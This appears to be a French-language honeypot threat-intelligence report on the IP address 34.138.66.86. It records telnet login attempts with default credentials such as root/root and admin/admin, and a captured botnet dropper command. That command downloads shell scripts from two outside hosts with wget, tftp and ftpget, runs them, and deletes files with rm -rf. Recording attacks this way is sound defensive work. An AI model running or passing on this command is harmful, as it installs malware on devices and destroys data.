TROYANOSYVIRUS
Menace ActiveFAIBLE

34.138.66.86

Premiere Detection31/03/2026
Derniere Activite31/03/2026
FAIGoogle LLC
🎯
20
Attaques Totales
🔌
1
Ports
📡
1
Types d'Attaque
🦠
2
Malware

Geolocalisation

Pays
🇺🇸 Estados Unidos
Ville
North Charleston
ASN
AS396982
FAI
Google LLC

Types d'Attaque

ssh_telnet_honeypot

Ports Attaques

23

Malware Associe

Identifiants Tentes

🔐root/root
1x
🔐root/icatch99
1x
🔐admin/admin
1x
🔐root/(vide)
1x

Commandes Executees

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://38.83.138.59:25884/nz.sh; curl -O http://38.83.138.59:25884/nz.sh; chmod 777 nz.sh; sh nz.sh; tftp 165.22.252.236 -c get nz.sh; chmod 777 nz.sh; sh nz.sh; tftp -r 3.sh -g 165.22.252.236; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 165.22.252.236 2.sh 2.sh; sh 2.sh; rm -rf nz.sh nz.sh 3.sh 2.sh; rm -rf *1x

Evaluation des Risques

25
/100
FaibleMoyenEleveCritique